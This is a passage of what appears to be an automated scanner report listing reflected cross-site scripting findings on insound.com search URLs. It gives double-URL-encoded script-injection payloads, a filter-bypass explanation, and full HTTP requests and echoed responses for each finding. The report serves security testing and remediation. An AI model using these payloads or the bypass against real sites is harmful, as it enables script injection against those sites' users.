<title>Nine Inch Nails85401</title><script>alert(1)</script>b09a2bfb86</title>
...[SNIP]...

1.230. http://www.insound.com/search/query/Nine%20Inch%20Nails&from=47597/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/Nine%20Inch%20Nails&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fafbc%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ef5df44c77e5 was submitted in the REST URL parameter 3. This input was echoed as fafbc"><script>alert(1)</script>f5df44c77e5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/Nine%20Inch%20Nailsfafbc%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ef5df44c77e5&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:37:59 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=sutnuagp5fgek2nj713irnjm61; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:37:59 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=120030481; expires=Sun, 09-Jan-2011 02:37:59 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=116457734; expires=Sun, 09-Jan-2011 02:37:59 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 38066

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<input type="hidden" name="query" value="Nine Inch Nailsfafbc"><script>alert(1)</script>f5df44c77e5" />
...[SNIP]...

1.231. http://www.insound.com/search/query/No%20Age&from=47597/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/No%20Age&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1bca8%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e0c917716b01 was submitted in the REST URL parameter 3. This input was echoed as 1bca8"><script>alert(1)</script>0c917716b01 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/No%20Age1bca8%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e0c917716b01&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:37:17 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=135udoe5ivhka5bj4elabkpbe1; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:37:17 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=120955501; expires=Sun, 09-Jan-2011 02:37:17 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=50266843; expires=Sun, 09-Jan-2011 02:37:17 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 18990

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<input type="hidden" name="query" value="No Age1bca8"><script>alert(1)</script>0c917716b01" />
...[SNIP]...

1.232. http://www.insound.com/search/query/No%20Age&from=47597/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/No%20Age&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as text between TITLE tags. The payload 3830b%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253edc8c45dc071 was submitted in the REST URL parameter 3. This input was echoed as 3830b</title><script>alert(1)</script>dc8c45dc071 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/No%20Age3830b%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253edc8c45dc071&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:37:24 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=rrol536cgedm4ga4n24gbv2tv0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:37:24 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=196307516; expires=Sun, 09-Jan-2011 02:37:24 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=490835597; expires=Sun, 09-Jan-2011 02:37:24 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 19006

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<title>No Age3830b</title><script>alert(1)</script>dc8c45dc071</title>
...[SNIP]...

1.233. http://www.insound.com/search/query/OFF!&from=47597/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/OFF!&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as text between TITLE tags. The payload aa06b%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eabbbe1eaea6 was submitted in the REST URL parameter 3. This input was echoed as aa06b</title><script>alert(1)</script>abbbe1eaea6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/OFF!aa06b%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eabbbe1eaea6&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:37:14 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=l5j16pq315q50g9r6hk5lrh1r6; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:37:14 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=429767147; expires=Sun, 09-Jan-2011 02:37:14 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=324732839; expires=Sun, 09-Jan-2011 02:37:14 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 19000

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<title>OFF!aa06b</title><script>alert(1)</script>abbbe1eaea6</title>
...[SNIP]...

1.234. http://www.insound.com/search/query/OFF!&from=47597/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/OFF!&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e27ad%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ef5aa40188b8 was submitted in the REST URL parameter 3. This input was echoed as e27ad"><script>alert(1)</script>f5aa40188b8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/OFF!e27ad%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ef5aa40188b8&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:37:08 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=759gjndij0d05l7pordgl1a3i0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:37:09 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=549753661; expires=Sun, 09-Jan-2011 02:37:09 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=549325982; expires=Sun, 09-Jan-2011 02:37:09 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 18984

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<input type="hidden" name="query" value="OFF!e27ad"><script>alert(1)</script>f5aa40188b8" />
...[SNIP]...

1.235. http://www.insound.com/search/query/Orange%20Juice&from=47597/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/Orange%20Juice&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as text between TITLE tags. The payload 3b3ac%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ed4e01c33c46 was submitted in the REST URL parameter 3. This input was echoed as 3b3ac</title><script>alert(1)</script>d4e01c33c46 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/Orange%20Juice3b3ac%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ed4e01c33c46&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:38:09 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=nd9j4vdl6oo0k2amph4jit8og2; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:38:09 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=315137184; expires=Sun, 09-Jan-2011 02:38:09 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=439268016; expires=Sun, 09-Jan-2011 02:38:09 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 38030

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<title>Orange Juice3b3ac</title><script>alert(1)</script>d4e01c33c46</title>
...[SNIP]...

1.236. http://www.insound.com/search/query/Orange%20Juice&from=47597/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/Orange%20Juice&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload efb87%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e92227f002c8 was submitted in the REST URL parameter 3. This input was echoed as efb87"><script>alert(1)</script>92227f002c8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/Orange%20Juiceefb87%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e92227f002c8&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:38:03 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=ekk2h7uvn780el522nm5i9sk05; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:38:03 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=342775868; expires=Sun, 09-Jan-2011 02:38:03 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=246604051; expires=Sun, 09-Jan-2011 02:38:03 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 37950

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<input type="hidden" name="query" value="Orange Juiceefb87"><script>alert(1)</script>92227f002c8" />
...[SNIP]...

1.237. http://www.insound.com/search/query/PJ%20Harvey&from=47597/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/PJ%20Harvey&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as text between TITLE tags. The payload b0484%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e980e1e0e4cd was submitted in the REST URL parameter 3. This input was echoed as b0484</title><script>alert(1)</script>980e1e0e4cd in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/PJ%20Harveyb0484%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e980e1e0e4cd&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:37:51 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=hup9s7p02s08bnl0d492fjjve1; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:37:51 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=415617196; expires=Sun, 09-Jan-2011 02:37:51 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=151000379; expires=Sun, 09-Jan-2011 02:37:51 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 36704

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<title>PJ Harveyb0484</title><script>alert(1)</script>980e1e0e4cd</title>
...[SNIP]...

1.238. http://www.insound.com/search/query/PJ%20Harvey&from=47597/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/PJ%20Harvey&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ff7bc%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e00312ed5ba8 was submitted in the REST URL parameter 3. This input was echoed as ff7bc"><script>alert(1)</script>00312ed5ba8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/PJ%20Harveyff7bc%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e00312ed5ba8&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:37:46 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=hjgdhgpuqjtu6l76m0599r4d76; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:37:46 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=100929960; expires=Sun, 09-Jan-2011 02:37:46 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=547547888; expires=Sun, 09-Jan-2011 02:37:46 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 36688

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<input type="hidden" name="query" value="PJ Harveyff7bc"><script>alert(1)</script>00312ed5ba8" />
...[SNIP]...

1.239. http://www.insound.com/search/query/Perfume%20Genius&from=47597/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/Perfume%20Genius&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 59d7f%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e8e61b363abb was submitted in the REST URL parameter 3. This input was echoed as 59d7f"><script>alert(1)</script>8e61b363abb in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/Perfume%20Genius59d7f%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e8e61b363abb&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:37:50 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=rmqk5ad0ukkier51h5hhdo29g0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:37:50 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=110210423; expires=Sun, 09-Jan-2011 02:37:50 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=570664823; expires=Sun, 09-Jan-2011 02:37:50 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 34409

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<input type="hidden" name="query" value="Perfume Genius59d7f"><script>alert(1)</script>8e61b363abb" />
...[SNIP]...

1.240. http://www.insound.com/search/query/Perfume%20Genius&from=47597/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/Perfume%20Genius&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as text between TITLE tags. The payload 8c2d4%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ed8e08f195e2 was submitted in the REST URL parameter 3. This input was echoed as 8c2d4</title><script>alert(1)</script>d8e08f195e2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/Perfume%20Genius8c2d4%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ed8e08f195e2&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:37:55 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=t02gfkaku815drva7eht8vpgl1; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:37:55 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=462160548; expires=Sun, 09-Jan-2011 02:37:55 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=74961451; expires=Sun, 09-Jan-2011 02:37:55 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 34425

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<title>Perfume Genius8c2d4</title><script>alert(1)</script>d8e08f195e2</title>
...[SNIP]...

1.241. http://www.insound.com/search/query/Purling%20Hiss&from=47597/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/Purling%20Hiss&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as text between TITLE tags. The payload fcea5%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ebbc3f0798f6 was submitted in the REST URL parameter 3. This input was echoed as fcea5</title><script>alert(1)</script>bbc3f0798f6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/Purling%20Hissfcea5%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ebbc3f0798f6&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:40:42 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=71tmt5kog5dn4ahl5331ucmk44; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:40:42 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=21586655; expires=Sun, 09-Jan-2011 02:40:42 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=7116944; expires=Sun, 09-Jan-2011 02:40:42 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
